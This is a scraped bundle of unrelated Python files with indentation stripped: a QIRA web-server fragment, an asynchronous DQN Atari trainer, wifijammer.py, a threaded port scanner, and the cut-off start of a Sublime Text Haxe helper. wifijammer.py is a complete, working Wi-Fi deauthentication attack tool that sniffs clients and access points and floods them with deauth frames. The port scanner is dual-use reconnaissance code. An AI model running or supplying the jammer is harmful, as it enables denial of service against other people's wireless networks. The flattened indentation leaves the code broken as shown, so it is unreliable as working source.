@socketio.on('setfunctionargswrap', namespace='/qira')
@socket_method
def setfunctionargswrap(func, args):
function = program.static[fhex(func)]['function']
if len(args.split()) == 1:
try:
function.nargs = int(args)
except:
pass
if len(args.split()) == 2:
abi = None
try:
abi = int(args.split()[0])
except:
for m in dir(model.ABITYPE):
if m == args.split()[0].upper():
abi = model.ABITYPE.__dict__[m]
function.nargs = int(args.split()[1])
    if abi is not None:
function.abi = abi
@socketio.on('getregisters', namespace='/qira')
@socket_method
def getregisters(forknum, clnum):
trace = program.traces[forknum]
# register names shouldn't be here
# though i'm not really sure where a better place is, qemu has this information
ret = []
REGS = program.tregs[0]
REGSIZE = program.tregs[1]
# 50 is a sane limit here, we don't really need to mark lib calls correctly
cls = trace.db.fetch_changes_by_clnum(clnum+1, 50)
regs = trace.db.fetch_registers(clnum)
for i in range(0, len(REGS)):
    if REGS[i] is None:
continue
rret = {"name": REGS[i], "address": i*REGSIZE, "value": ghex(regs[i]), "size": REGSIZE, "regactions": ""}
act = set()
for c in cls:
if c['address'] == i*REGSIZE:
act.add(c['type'])
# this +1 is an ugly hack
if 'R' in act:
rret['regactions'] = "regread"
if 'W' in act:
if "regread" == rret['regactions']:
rret['regactions'] = "regreadwrite"
else:
rret['regactions'] = "regwrite"
rret['num'] = i
ret.append(rret)
emit('registers', ret)
# ***** generic webserver stuff *****
@app.route('/', defaults={'path': 'index.html'})
@app.route('/<path:path>')
def serve(path):
# best security?
if ".." in path:
return
ext = path.split(".")[-1]
try:
dat = open(qira_config.BASEDIR + "/web/"+path).read()
except:
return ""
if ext == 'js' and not path.startswith('client/compatibility/') and path.startswith('client/'):
dat = "(function(){"+dat+"})();"
if ext == 'js':
return Response(dat, mimetype="application/javascript")
elif ext == 'css':
return Response(dat, mimetype="text/css")
else:
return Response(dat, mimetype="text/html")
# must go at the bottom
def run_server(largs, lprogram):
global args
global program
global static
args = largs
program = lprogram
# web static moved to external file
import qira_webstatic
qira_webstatic.init(lprogram)
print "****** starting WEB SERVER on %s:%d" % (qira_config.HOST, qira_config.WEB_PORT)
threading.Thread(target=mwpoller).start()
try:
socketio.run(app, host=qira_config.HOST, port=qira_config.WEB_PORT, log_output=False)
except KeyboardInterrupt:
print "*** User raised KeyboardInterrupt"
exit()
|
Asynchronous.py
|
import random
import numpy as np
import gym
from gym.core import ObservationWrapper
from gym.spaces import Box
import cv2
import atari_wrappers
from framebuffer import FrameBuffer
import torch
import torch.nn as nn
import os
import time
import torch.multiprocessing as mp
from tensorboardX import SummaryWriter
class PreprocessAtariObs(ObservationWrapper):
def __init__(self, env):
"""A gym wrapper that crops, scales image into the desired shapes and grayscales it."""
ObservationWrapper.__init__(self, env)
self.img_size = (1, 64, 64)
self.observation_space = Box(0.0, 1.0, self.img_size)
def _to_gray_scale(self, rgb, channel_weights=[0.8, 0.1, 0.1]):
return (rgb*channel_weights).sum(axis=-1)
def _observation(self, img):
"""what happens to each observation"""
# Here's what you need to do:
# * crop image, remove irrelevant parts
# * resize image to self.img_size
# (use imresize from any library you want,
# e.g. opencv, skimage, PIL, keras)
# * cast image to grayscale
# * convert image pixels to (0,1) range, float32 type
image = img[30:195,6:156]
image = self._to_gray_scale(image)
image = cv2.resize(image,self.img_size[1:],interpolation=cv2.INTER_NEAREST)
image = image.reshape(self.img_size)
image = np.float32(image)/255
return image
def PrimaryAtariWrap(env, clip_rewards=True):
assert 'NoFrameskip' in env.spec.id
    # This wrapper holds the same action for <skip> frames and outputs
    # the maximal pixel value of the last 2 frames (to handle blinking
    # in some envs)
    env = atari_wrappers.MaxAndSkipEnv(env, skip=4)
    # This wrapper sends done=True when each life is lost
    # (not only after all 5 lives given by the game rules are gone).
    # It should make it easier for the agent to understand that losing is bad.
    env = atari_wrappers.EpisodicLifeEnv(env)
    # This wrapper launches the ball when an episode starts.
    # Without it the agent has to learn this action, too.
    # It actually can, but learning would take longer.
env = atari_wrappers.FireResetEnv(env)
# This wrapper transforms rewards to {-1, 0, 1} according to their sign
if clip_rewards:
env = atari_wrappers.ClipRewardEnv(env)
# This wrapper is yours :)
env = PreprocessAtariObs(env)
return env
def make_env(clip_rewards=True, seed=None):
env = gym.make("BreakoutNoFrameskip-v4") # create raw env
if seed is not None:
env.seed(seed)
env = PrimaryAtariWrap(env, clip_rewards)
env = FrameBuffer(env, n_frames=4, dim_order='pytorch')
return env
class Flatten(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return x.view(x.size(0), -1)
class DQNAgent(nn.Module):
def __init__(self, state_shape, n_actions, epsilon=0):
super().__init__()
self.epsilon = epsilon
self.n_actions = n_actions
self.state_shape = state_shape
# Define your network body here. Please make sure agent is fully contained here
self.net = nn.Sequential(
nn.Conv2d(state_shape[0], 16, (3,3), stride=2),
nn.ReLU(),
nn.Conv2d(16, 32, (3,3), stride=2),
nn.ReLU(),
nn.Conv2d(32, 64, (3,3), stride=2),
nn.ReLU(),
Flatten(),
nn.Linear(3136,256),
nn.ReLU(),
nn.Linear(256,n_actions)
)
def forward(self, state_t):
"""
takes agent's observation (tensor), returns qvalues (tensor)
:param state_t: a batch of 4-frame buffers, shape = [batch_size, 4, h, w]
"""
# Use your network to compute qvalues for given state
qvalues = self.net(state_t)
return qvalues
def get_qvalues(self, states):
"""
like forward, but works on numpy arrays, not tensors
"""
model_device = next(self.parameters()).device
states = torch.tensor(states, device=model_device, dtype=torch.float)
qvalues = self.forward(states)
return qvalues.data.cpu().numpy()
def sample_actions(self, qvalues):
"""pick actions given qvalues. Uses epsilon-greedy exploration strategy. """
epsilon = self.epsilon
batch_size, n_actions = qvalues.shape
random_actions = np.random.choice(n_actions, size=batch_size)
best_actions = qvalues.argmax(axis=-1)
should_explore = np.random.choice(
[0, 1], batch_size, p=[1-epsilon, epsilon])
return np.where(should_explore, random_actions, best_actions)
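# A minimal sketch of the epsilon-greedy rule implemented above; the qvalues
# array is made up purely for illustration:
#
#   qvalues = np.array([[1.0, 3.0, 2.0]])               # batch of 1, 3 actions
#   best = qvalues.argmax(axis=-1)                       # -> array([1])
#   explore = np.random.choice([0, 1], 1, p=[0.9, 0.1])  # epsilon = 0.1
#   action = np.where(explore, np.random.choice(3, 1), best)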
def evaluate(env, agent, n_games=1, greedy=False, t_max=10000):
""" Plays n_games full games. If greedy, picks actions as argmax(qvalues). Returns mean reward. """
rewards = []
for _ in range(n_games):
s = env.reset()
reward = 0
for _ in range(t_max):
qvalues = agent.get_qvalues([s])
action = qvalues.argmax(axis=-1)[0] if greedy else agent.sample_actions(qvalues)[0]
s, r, done, _ = env.step(action)
reward += r
if done:
break
rewards.append(reward)
return np.mean(rewards)
class Net(nn.Module):
def __init__(self, state_shape, n_actions):
super().__init__()
self.conv = nn.Sequential(
nn.Conv2d(state_shape[0], 16, (3,3), stride=2),
nn.ReLU(),
nn.Conv2d(16, 32, (3,3), stride=2),
nn.ReLU(),
nn.Conv2d(32, 64, (3,3), stride=2),
nn.ReLU(),
Flatten()
)
self.a = nn.Sequential(
nn.Linear(3136,256),
nn.ReLU(),
nn.Linear(256, n_actions)
)
self.v = nn.Sequential(
nn.Linear(3136,256),
nn.ReLU(),
nn.Linear(256, 1)
)
def forward(self,x):
h = self.conv(x)
A = self.a(h)
V = self.v(h)
Q = V + A - torch.mean(A, dim=-1, keepdim=True)
return Q
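# Dueling decomposition used above: Q(s, a) = V(s) + A(s, a) - mean_a A(s, a).
# Subtracting the mean advantage makes the value/advantage split identifiable;
# without it a constant could be shifted between V and A without changing Q.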
class DDQNAgent(DQNAgent):
def __init__(self, state_shape, n_actions, epsilon):
super().__init__(state_shape, n_actions, epsilon)
self.net = Net(state_shape,n_actions)
def share_grad(net, shared_net):
for param, shared_param in zip(net.parameters(),shared_net.parameters()):
        if param.grad is None:
param.grad = torch.zeros_like(param) # initialization
shared_param._grad = param.grad # reference
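# share_grad aliases each local parameter's gradient buffer onto the shared
# network, Hogwild-style: after loss.backward() on the process-local net, an
# optimizer built over the shared parameters sees those same gradients. A tiny
# sketch of the pattern (module sizes made up for illustration):
#
#   shared = nn.Linear(4, 2); shared.share_memory()
#   local = nn.Linear(4, 2)
#   share_grad(local, shared)
#   local(torch.randn(1, 4)).sum().backward()   # fills the shared grads too
#   torch.optim.SGD(shared.parameters(), 0.1).step()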
def eval(target_agent,T, I_eval, T_max):
writer = SummaryWriter()
T_prev = 0
time_prev = 0
while T.value<T_max:
if (T.value - T_prev) < I_eval:
time.sleep(1)
continue
time_per_iter = (time.time()-time_prev)/(T.value-T_prev)
T_prev = T.value
time_prev = time.time()
clipped_env = make_env(seed = T_prev)
env = make_env(clip_rewards=False,seed = T_prev)
clipped_reward = evaluate(clipped_env,target_agent,n_games=5,greedy=True)
reward = evaluate(env,target_agent,n_games=5,greedy=True)
v0 = np.max(target_agent.get_qvalues([clipped_env.reset()]))
writer.add_scalar('data/clipped_reward', clipped_reward, T_prev)
writer.add_scalar('data/reward', reward, T_prev)
writer.add_scalar('data/v0', v0, T_prev)
writer.add_scalar('data/time_per_iter', time_per_iter, T_prev)
env.close()
clipped_env.close()
writer.close()
def process_train(id, agent, target_agent, T, n_update, I_target,num_steps, T_max, lr, epsilon_decay,gamma):
torch.set_default_tensor_type(next(agent.parameters()).type())
device = next(agent.parameters()).device
env = make_env(seed=id)
s = env.reset()
n_actions = env.action_space.n
state_shape = env.observation_space.shape
np.random.seed(id)
process_agent = DDQNAgent(state_shape, n_actions, epsilon=np.random.uniform(0.7,1)).to(device)
epsilon_min = 10**np.random.uniform(-0.5,-2.2)
share_grad(process_agent, agent)
opt = torch.optim.Adam(agent.parameters(), lr)
scheduler = torch.optim.lr_scheduler.MultiStepLR(opt, milestones=[200000,500000,1000000], gamma=0.3) # lr scheduler
while T.value<T_max:
process_agent.load_state_dict(agent.state_dict())
rewards = []
states = []
actions = []
for _ in range(num_steps):
states.append(s)
qvalues = process_agent.get_qvalues([s])
a = process_agent.sample_actions(qvalues)[0]
s, r, done, _ = env.step(a)
actions.append(a)
rewards.append(r)
process_agent.epsilon = max(epsilon_min, process_agent.epsilon-epsilon_decay)
if done:
s = env.reset()
break
with T.get_lock():
T.value += len(states)
R = []
if done:
R.append(0)
else:
a_max = np.argmax(process_agent.get_qvalues([s]))
R.append(target_agent.get_qvalues([s])[0,a_max])
states = torch.tensor(states)
Q = process_agent(states)[range(len(actions)), actions]
for _ in range(len(rewards)):
r = rewards.pop()
R.append(r + gamma*R[-1])
R = torch.tensor(R[-1:0:-1])
loss = torch.mean((R-Q)**2)
loss.backward()
nn.utils.clip_grad_norm_(process_agent.parameters(), 20)
opt.step()
opt.zero_grad()
scheduler.step()
if T.value//I_target > n_update.value:
with n_update.get_lock():
n_update.value += 1
target_agent.load_state_dict(agent.state_dict())
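# The return computation above builds n-step targets backwards:
#   R_t = r_t + gamma * R_{t+1},
# seeded with 0 at episode end, or with the Double-DQN bootstrap
# Q_target(s', argmax_a Q_local(s', a)) otherwise. Worked example with
# gamma = 0.9, rewards [1, 0, 1] and bootstrap 2:
#   R_2 = 1 + 0.9*2    = 2.8
#   R_1 = 0 + 0.9*2.8  = 2.52
#   R_0 = 1 + 0.9*2.52 = 3.268  ->  targets [3.268, 2.52, 2.8]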
if __name__ == '__main__':
mp.set_start_method('spawn')
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['CUDA_VISIBLE_DEVICES'] = "3"
env = make_env()
n_actions = env.action_space.n
state_shape = env.observation_space.shape
env.close()
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
gamma = 0.99
num_processes = 8
num_steps = 5
T_max = int(1e7)
I_eval = 20000
I_target = 15000
lr = 1e-4
epsilon_decay = 5e-5
agent = DDQNAgent(state_shape, n_actions, epsilon=0).to(device)
target_agent = DDQNAgent(state_shape, n_actions, epsilon=0).to(device)
target_agent.load_state_dict(agent.state_dict())
agent.share_memory()
target_agent.share_memory()
processes = []
T = mp.Value('I', 0)
n_update = mp.Value('I', 0)
p = mp.Process(target=eval, args=(target_agent,T, I_eval, T_max))
p.start()
processes.append(p)
for id in range(1, num_processes):
p = mp.Process(target=process_train, args=(id, agent, target_agent, T, n_update, I_target,num_steps, T_max, lr, epsilon_decay,gamma))
p.start()
processes.append(p)
for p in processes:
p.join()
torch.save(agent.state_dict(), str(T_max)+".state_dict")
|
wifijammer.py
|
#!/usr/bin/env python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s",
"--skip",
help="Skip deauthing this MAC address. \
Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i",
"--interface",
help="Choose monitor mode interface. \
By default script will find the most powerful \
interface and starts monitor mode on it. \
Example: -i mon5")
parser.add_argument("-c",
"--channel",
help="Listen on and deauth only clients on the specified channel. \
Example: -c 6")
parser.add_argument("-m",
"--maximum",
help="Choose the maximum number of clients to deauth. \
List of clients will be emptied and repopulated \
after hitting the limit. Example: -m 5")
parser.add_argument("-n",
"--noupdate",
help="Do not clear the deauth list when the maximum (-m) \
number of client/AP combos is reached. \
Must be used in conjunction with -m. \
Example: -m 10 -n",
action='store_true')
parser.add_argument("-t",
"--timeinterval",
help="Choose the time interval between packets being sent. \
Default is as fast as possible. \
If you see scapy errors like 'no buffer space' \
try: -t .00001")
parser.add_argument("-p",
"--packets",
help="Choose the number of packets to send in each deauth burst. \
Default value is 1; \
1 packet to the client and 1 packet to the AP. \
Send 2 deauth packets to the client \
and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d",
"--directedonly",
help="Skip the deauthentication packets to the broadcast \
address of the access points and only send them \
to client/AP pairs",
action='store_true')
parser.add_argument("-a",
"--accesspoint",
help="Enter the MAC address of a specific access point to target")
parser.add_argument("--world",
help="N. American standard is 11 channels but the rest \
of the world it's 13 so this options enables the \
scanning of 13 channels",
action="store_true")
return parser.parse_args()
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
try:
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
except OSError:
sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
for line in proc.communicate()[0].split('\n'):
        if len(line) == 0: continue # Skip empty strings
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
    print '['+G+'+'+W+'] Starting monitor mode on '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
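# Note: 0x8927 in the ioctl above is SIOCGIFHWADDR on Linux; bytes 18:24 of the
# returned struct hold the raw hardware address, which is then formatted as
# colon-separated hex. This trick is Linux-specific.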
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
    First time it runs through the channels it stays on each channel for a second
    in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
channelNum = 0
maxChan = 11 if not args.world else 13
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > maxChan:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
try:
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
except OSError:
print '['+R+'-'+W+'] Could not execute "iw"'
os.kill(os.getpid(),SIGINT)
sys.exit(1)
for line in proc.communicate()[1].split('\n'):
            if len(line) > 2: # iw dev shouldn't display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def noise_filter(skip, addr1, addr2):
    # Broadcast, null, IPv6 mcast, IPv6 mcast, spanning tree, IPv4 mcast, our own MAC
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore.append(skip)
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
pkt.addr1 = pkt.addr1.lower()
pkt.addr2 = pkt.addr2.lower()
# Filter out all other APs and clients if asked
if args.accesspoint:
if args.accesspoint not in [pkt.addr1, pkt.addr2]:
return
if args.skip == pkt.addr2:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
# Ignore all the noisy packets like spanning tree
#if noise_filter(skip, pkt.addr1, pkt.addr2):
# return
            # Control = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3.lower()
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)
|
main.py
|
import threading
import socket
from time import sleep
from datetime import datetime
from pythonping import ping
from sys import stdout, argv
import json
knownServices = {
21: "ftp",
22: "ssh",
53: "dns",
80: "http",
443: "https",
3306: "mysql",
3389: "rdp",
11211: "memcached"
}
class scan(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.targetIP = argv[1]
self.newDict = {}
def recognizeServices(self, ip, port):
if(port in knownServices):
self.newDict[ip]["ports"][port] = knownServices[port]
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mFound Port\x1b[97m: \x1b[95m%d \x1b[92mService\x1b[97m: \x1b[95m%s\x1b[97m" % (port, knownServices[port]))
else:
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mFound Port\x1b[97m: \x1b[95m%d \x1b[92mService\x1b[97m: \x1b[95mUnknown\x1b[97m" % port)
self.newDict[ip]["ports"][port] = "unknown"
def scan(self, ip, rangeToScan, tts):
sRange = int(rangeToScan.split('-')[0])
eRange = int(rangeToScan.split('-')[1])
for ports in range(sRange, eRange):
scanS = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
scanS.settimeout(tts)
scanC = scanS.connect_ex((ip, ports))
if scanC == 0:
self.recognizeServices(ip, ports)
scanS.close()
else:
scanS.close()
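    # connect_ex returns 0 when the TCP connect succeeds and an errno value
    # otherwise, so it never raises on a closed port; that is what keeps the
    # loop above free of try/except.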
def run(self, ip):
activeThreads = []
threads_to_use = 255
delayScan = ping(ip, size=5, count=4)
if(float(delayScan.rtt_avg_ms) >= 1000):
ourDelay = 0.08
else:
ourDelay = delayScan.rtt_avg_ms / 1000 + 0.01
self.newDict[ip] = {}
self.newDict[ip]["ports"] = {}
port_a = 0
port_b = 257
self.totalSTime = datetime.now()
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mAssigning \x1b[95m%d \x1b[92mThreads to\x1b[97m: \x1b[95m%s\x1b[97m" % (threads_to_use, ip))
for x in range(0, threads_to_use):
port_range = "%d-%d" % (
port_a,
port_b
)
thread = threading.Thread(target=self.scan, args=(ip, port_range, ourDelay))
thread.start()
activeThreads.append(thread)
port_a += 257
port_b += 257
        # Join every thread; removing items while iterating would skip half of them
        for threads in activeThreads:
            threads.join()
self.t2 = datetime.now()
if(22 in self.newDict[ip]['ports']):
self.newDict[ip]["type"] = "Possible server"
else:
self.newDict[ip]["type"] = "Possible home router"
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mIP\x1b[97m: \x1b[95m%s \x1b[92mdone.\x1b[97m" % ip)
self.saveStats(self.newDict)
def saveStats(self, dictionary):
        with open('data.json', 'w+') as f:
json.dump(dictionary, f, indent=4)
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mSaved infos to data.json\x1b[97m")
def main(self):
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mStarting threads for scanning.\x1b[97m")
self.run(self.targetIP)
sleep(0.2)
total = self.t2 - self.totalSTime
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mTotal Scanning Time\x1b[97m: \x1b[95m%s\x1b[97m" % total)
return True
scan().main()
|
haxe_helper.py
|
import sys, sublime, sublime_plugin
import subprocess, time
import os, signal
import errno
from subprocess import Popen, PIPE
from datetime import datetime
import threading
import traceback
import shlex
import re
def HaxeComplete_inst():
try: # Python 3
from ..HaxeComplete import HaxeComplete
except (ValueError): # Python 2
from HaxeComplete import HaxeComplete
return HaxeComplete.inst
spaceChars = re.compile("\s")
wordChars = re.compile("[a-z0-9._]", re.I)
importLine = re.compile("^([ \t]*)import\s+([a-z0-9._*]+);", re.I | re.M)
packageLine = re.compile("package\s*([a-z0-9.]*);", re.I)
compactFunc = re.compile("\(.*\)")
compactProp = re.compile(":.*\.([a-z_0-9]+)", re.I)
libLine = re.compile("([^:]*):[^\[]*\[(dev\:)?(.*)\]")
classpathLine = re.compile("Classpath : (.*)")
typeDecl = re.compile("(class|interface|enum|typedef|abstract)\s+([A-Z][a-zA-Z0-9_]*)\s*(<[a-zA-Z0-9_,]+>)?" , re.M )
libFlag = re.compile("-lib\s+(.*?)")
skippable = re.compile("^[a-zA-Z0-9_\s]*$")
inAnonymous = re.compile("[{,]\s*([a-zA-Z0-9_\"\']+)\s*:\s*$" , re.M | re.U )
extractTag = re.compile("<([a-z0-9_-]+).*\s(name|main|path)=\"([a-z0-9_./-]+)\"", re.I)
extractTagName = re.compile("<([a-z0-9_-]+).*\s", re.I)
variables = re.compile("var\s+([^:;(\s]*)", re.I)
functions = re.compile("function\s+([^;\.\(\)\s]*)", re.I)
functionParams = re.compile("function\s+[a-zA-Z0-9_]+\s*\(([^\)]*)", re.M)
paramDefault = re.compile("(=\s*\"*[^\"]*\")", re.M)
isType = re.compile("^[A-Z][a-zA-Z0-9_]*$")
comments = re.compile("(//[^\n\r]*?[\n\r]|/\*(.*?)\*/)", re.MULTILINE | re.DOTALL )
haxeVersion = re.compile("(Haxe|haXe) Compiler (([0-9]\.[0-9])\.?[0-9]?)",re.M)
haxeFileRegex = "^(.+):(\\d+): (?:lines \\d+-\\d+|character(?:s \\d+-| )(\\d+)) : (.*)$"
controlStruct = re.compile( "\s*(if|switch|for|while)\s*\($" );
try:
STARTUP_INFO = subprocess.STARTUPINFO()
STARTUP_INFO.dwFlags |= subprocess.STARTF_USESHOWWINDOW
STARTUP_INFO.wShowWindow = subprocess.SW_HIDE
except (AttributeError):
STARTUP_INFO = None
try :
stexec = __import__("exec")
ExecCommand = stexec.ExecCommand
AsyncProcess = stexec.AsyncProcess
except ImportError as e :
import Default
stexec = getattr( Default , "exec" )
ExecCommand = stexec.ExecCommand
AsyncProcess = stexec.AsyncProcess
unicode = str #dirty...
def cache(filename, data=None):
cache_dir = os.path.join(
sublime.packages_path(), 'User', 'Haxe.cache')
cache_file = os.path.join(cache_dir, filename)
if not os.path.exists(cache_dir):
try:
os.makedirs(cache_dir)
except OSError as e:
if e.errno != errno.EEXIST:
return None
# read
if data is None:
try:
f = open(cache_file, 'r')
data = f.read()
f.close()
return data
except:
return None
# write
try:
